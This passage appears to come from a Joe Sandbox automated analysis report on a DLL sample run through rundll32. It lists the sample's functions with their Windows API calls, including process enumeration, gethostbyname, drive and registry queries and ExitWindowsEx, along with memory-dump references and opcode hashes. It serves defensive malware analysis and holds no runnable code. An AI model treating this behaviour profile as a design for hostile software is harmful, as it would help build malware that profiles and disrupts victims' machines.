                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FirstProcess32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2623510744-0
                                                                                                                                                                          • Opcode ID: 77353f5716135edde9ad633b9f31e3de775be7a2ad78027e3471a0842fb40d1b
                                                                                                                                                                          • Instruction ID: 5bf3ea98f070a2570916fa8bd6be237ec7ca37b5474a227deadc1955bba6efa9
                                                                                                                                                                          • Opcode Fuzzy Hash: 77353f5716135edde9ad633b9f31e3de775be7a2ad78027e3471a0842fb40d1b
                                                                                                                                                                          • Instruction Fuzzy Hash: 29A00176509612ABDA42AB51CE4884ABEA2BBA8381F01C819F5C940034CB3284A5EB12
                                                                                                                                                                          Function 10004115 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 1000411D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NextProcess32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1850201408-0
                                                                                                                                                                          • Opcode ID: 76ac9178f20d1e5b2dd5acb7bf8efce219d4f311f27991283bdd85d0e408ffac
                                                                                                                                                                          • Instruction ID: ad0ec3404e59fce47abb20f3156c1013a00ec4a2375eb1d4fc778c90646c9428
                                                                                                                                                                          • Opcode Fuzzy Hash: 76ac9178f20d1e5b2dd5acb7bf8efce219d4f311f27991283bdd85d0e408ffac
                                                                                                                                                                          • Instruction Fuzzy Hash: C5A00136408616ABDA42AB50CE4884ABEB2BBA8381F11C819F58941034C73684A5EB12
                                                                                                                                                                          Function 10003EB4 Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 10003EB8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: gethostbyname
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 930432418-0
                                                                                                                                                                          • Opcode ID: fc91f4d470c00956c20761c75c87ac3b5c2c2a029df382280b375b46dca54598
                                                                                                                                                                          • Instruction ID: 7611b61dc22816f8d5f353788f7ebe3095af129dd0cc495379a0ce63c0a0d031
                                                                                                                                                                          • Opcode Fuzzy Hash: fc91f4d470c00956c20761c75c87ac3b5c2c2a029df382280b375b46dca54598
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B900274546110ABDE015B11CF494097A61BB84711F048454E04A40131C7318810EA01
                                                                                                                                                                          Function 10003F72 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,10005CA4,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00080000,00000000), ref: 10003F76
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1174141254-0
                                                                                                                                                                          • Opcode ID: 45c733f9b34b8ea95908bfc7e9da03f807b7cee25ea2d2ba077378ef7c34ab25
                                                                                                                                                                          • Instruction ID: c8e16be2efcce4d448928bc2c60560182cfc46435cfcb87bea268b953d58fe61
                                                                                                                                                                          • Opcode Fuzzy Hash: 45c733f9b34b8ea95908bfc7e9da03f807b7cee25ea2d2ba077378ef7c34ab25
                                                                                                                                                                          • Instruction Fuzzy Hash: CB9002705051109FDE015B51CF494097A61AF84701B008458E09985031C7318910FA01
                                                                                                                                                                          Function 1000400A Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDriveTypeA.KERNEL32(?,1000826F,10015958), ref: 1000400E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DriveType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 338552980-0
                                                                                                                                                                          • Opcode ID: 7c79f17bced885cdb9c1f6f7975923c4ee5d1aa6cab9913023579efd0895b657
                                                                                                                                                                          • Instruction ID: a1a8ac53c5cfb0e486bd6d98d172d36f24ef9d27b55460fc84cfdef9c945b13a
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c79f17bced885cdb9c1f6f7975923c4ee5d1aa6cab9913023579efd0895b657
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E9002304041109BDE015B10CE494097AA2AB85701B00C454E05540130C7368911EA01
                                                                                                                                                                          Function 10004092 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCloseKey.KERNEL32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,-00000298,-00000020,80000002,-00000094,00000000,000F003F,-0000001C,00000000,00000000), ref: 10004096
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                          • Opcode ID: a92c0e71bed44d8b38908b017688781e2389fbe67ed51b21ca4416f74f44b28f
                                                                                                                                                                          • Instruction ID: aee7d52c32ff15d31c72f216b84899083fd4a99e4b5d443cf07de2a1f5c34de8
                                                                                                                                                                          • Opcode Fuzzy Hash: a92c0e71bed44d8b38908b017688781e2389fbe67ed51b21ca4416f74f44b28f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E9002705055119FDE015B51CF494097A65AF84701B008454E04945430C771C810EA01

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 1000AEE3 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: K
                                                                                                                                                                          • API String ID: 0-856455061
                                                                                                                                                                          • Opcode ID: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
                                                                                                                                                                          • Instruction ID: 49037399acb4103f62bffe2178a7c6eb5bfae0e2df4e7c6f60cc06e2240279ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B9123311046896EDB21CFAC8C81EFFBBBCAF06A40F840549FE85C7242D255E92D9771
                                                                                                                                                                          Function 10003F63 Relevance: 1.5, APIs: 1, Instructions: 4shutdownCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ExitWindowsEx.USER32(?,?), ref: 10003F6B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitWindows
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1089080001-0
                                                                                                                                                                          • Opcode ID: 948c2a7f0c5d5ede02fe99717983b13c4886eb2a62ea7ff32ac2c2e9a7e934d6
                                                                                                                                                                          • Instruction ID: d755a886b70c0147dd0aab33d02d7d5fa1b38d847ab88bea65de3ac2632bab91
                                                                                                                                                                          • Opcode Fuzzy Hash: 948c2a7f0c5d5ede02fe99717983b13c4886eb2a62ea7ff32ac2c2e9a7e934d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 76A00175509212ABDE025B51DE5885ABEB6EB88381F108858F58940031C73284A1EB02
                                                                                                                                                                          Function 1000B247 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
                                                                                                                                                                          • Instruction ID: a40c7daf644cd4b2a2b0ad4fe7dbc83aae4c77c1570000a9d1e45956817e59d9
                                                                                                                                                                          • Opcode Fuzzy Hash: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
                                                                                                                                                                          • Instruction Fuzzy Hash: BBD102311046896EDB21CFAC8C80EFFBBBCAF4AA40F840549FD85CB642D555E92DA771
                                                                                                                                                                          Function 1000B730 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
                                                                                                                                                                          • Instruction ID: c140640018070a382e87d2efe4d7af4fb2d1fd719fffe26d7e03c79696bb0d7d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
                                                                                                                                                                          • Instruction Fuzzy Hash: 56313C33E2C5B607E324DF7A4C84025F7D6EB4A06275A8779DE88E7255D128EC11C7D0
                                                                                                                                                                          Function 100086B3 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c970343d888315107044a5a8171f0f0c52c42d3ac5d27aaa657a03a4032f7cde
                                                                                                                                                                          • Instruction ID: 404ae21b218c9f480b2065de820d351e1321f850f982fae0b77b9cc3d9464433
                                                                                                                                                                          • Opcode Fuzzy Hash: c970343d888315107044a5a8171f0f0c52c42d3ac5d27aaa657a03a4032f7cde
                                                                                                                                                                          • Instruction Fuzzy Hash: 35E07D5FF4003A0BD130BAB8FC337C52380CB002B0F544429BD598B141C87ED05E4489
                                                                                                                                                                          Function 10007231 Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 366COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 1000735B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007370
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 1000738B
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 1000739A
                                                                                                                                                                            • Part of subcall function 10007A85: VariantInit.OLEAUT32(?), ref: 10007AC4
                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007528
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 10007536
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
